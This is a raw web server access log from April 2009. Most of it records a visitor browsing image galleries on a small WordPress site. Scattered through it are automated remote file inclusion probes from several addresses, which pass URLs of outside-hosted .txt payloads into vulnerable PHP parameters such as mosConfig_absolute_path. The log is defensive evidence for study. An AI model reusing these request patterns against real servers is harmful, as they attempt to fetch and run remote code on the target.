59.16.91.22 - - [02/Apr/2009:09:20:48 -0700] "GET /logs/access_080427.log//lostpasswd.php?env[include_prefix]=http://MetalBlack.altervista.org/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-102.jpg HTTP/1.0" 200 456052 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-106.jpg HTTP/1.0" 200 552341 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:20:50 -0700] "GET /logs/access_080129.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:20:50 -0700] "GET /logs/access_071228.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.0" 200 344118 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-108.jpg HTTP/1.0" 200 492938 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-109.jpg HTTP/1.0" 200 499830 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:20:54 -0700] "GET /logs/access_080622.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110.jpg HTTP/1.0" 200 531565 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:56 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/1677_1.jpg HTTP/1.0" 200 27579 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:20:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111.jpg HTTP/1.0" 200 533106 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:21:00 -0700] "GET /index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.803" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-185.jpg HTTP/1.0" 200 297877 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:21:00 -0700] "GET /index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.803" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:00 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1006.jpg HTTP/1.0" 200 312773 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-112.jpg HTTP/1.0" 200 681132 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-113.jpg HTTP/1.0" 200 708496 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-114.jpg HTTP/1.0" 200 607043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:07 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0166.jpg HTTP/1.0" 200 298247 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-118.jpg HTTP/1.0" 200 384886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:21:09 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.58.32.74 - - [02/Apr/2009:09:21:10 -0700] "GET /logs//include/write.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:10 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_1.jpg HTTP/1.0" 200 20783 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-119.jpg HTTP/1.0" 200 591382 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.58.32.74 - - [02/Apr/2009:09:21:11 -0700] "GET /include/write.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-120.jpg HTTP/1.0" 200 636941 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121.jpg HTTP/1.0" 200 469065 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:18 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1008.jpg HTTP/1.0" 200 332259 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_3.jpg HTTP/1.0" 200 394221 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-123.jpg HTTP/1.0" 200 406611 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-125.jpg HTTP/1.0" 200 700424 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:23 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.0" 200 386726 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127.jpg HTTP/1.0" 200 647576 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:24 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/1fb0_1.jpg HTTP/1.0" 200 29325 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138.jpg HTTP/1.0" 200 562801 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-140.jpg HTTP/1.0" 200 548515 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-146.jpg HTTP/1.0" 200 451211 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149.jpg HTTP/1.0" 200 265071 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155.jpg HTTP/1.0" 200 372924 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-163.jpg HTTP/1.0" 200 399085 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_1.jpg HTTP/1.0" 200 542867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165.jpg HTTP/1.0" 200 347615 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:21:34 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.97.10.114 - - [02/Apr/2009:09:21:34 -0700] "GET /logs/access_080414.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.97.10.114 - - [02/Apr/2009:09:21:34 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.97.10.114 - - [02/Apr/2009:09:21:34 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:35 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1007.jpg HTTP/1.0" 200 267149 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-237.jpg HTTP/1.0" 200 341180 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_1.jpg HTTP/1.0" 200 523788 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.193.230.2 - - [02/Apr/2009:09:21:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.230.2 - - [02/Apr/2009:09:21:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.230.2 - - [02/Apr/2009:09:21:37 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-063_0.jpg HTTP/1.0" 200 328303 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:40 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.0" 200 421697 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
82.97.10.114 - - [02/Apr/2009:09:21:41 -0700] "GET /logs/access_080427.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:21:41 -0700] "GET /logs/access_081009.log%20%20//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:21:41 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:21:41 -0700] "GET /index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060_0.jpg HTTP/1.0" 200 479572 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_0.jpg HTTP/1.0" 200 246333 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_1.jpg HTTP/1.0" 200 270750 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048_1.jpg HTTP/1.0" 200 307908 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-066_0.jpg HTTP/1.0" 200 378384 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-069_0.jpg HTTP/1.0" 200 206667 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067_0.jpg HTTP/1.0" 200 466805 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074_0.jpg HTTP/1.0" 200 559939 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:51 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1015.jpg HTTP/1.0" 200 280431 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:21:53 -0700] "GET /logs/access_081202.log%20%20//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-263.jpg HTTP/1.0" 200 438268 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-075_0.jpg HTTP/1.0" 200 488352 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-072_0.jpg HTTP/1.0" 200 566463 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079_0.jpg HTTP/1.0" 200 373108 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.0" 200 387384 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:21:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083_0.jpg HTTP/1.0" 200 346900 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-085_0.jpg HTTP/1.0" 200 371866 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-086_0.jpg HTTP/1.0" 200 267664 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.246.20.221 - - [02/Apr/2009:09:22:02 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-088_0.jpg HTTP/1.0" 200 351133 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.246.20.221 - - [02/Apr/2009:09:22:03 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.246.20.221 - - [02/Apr/2009:09:22:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-089_0.jpg HTTP/1.0" 200 326432 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
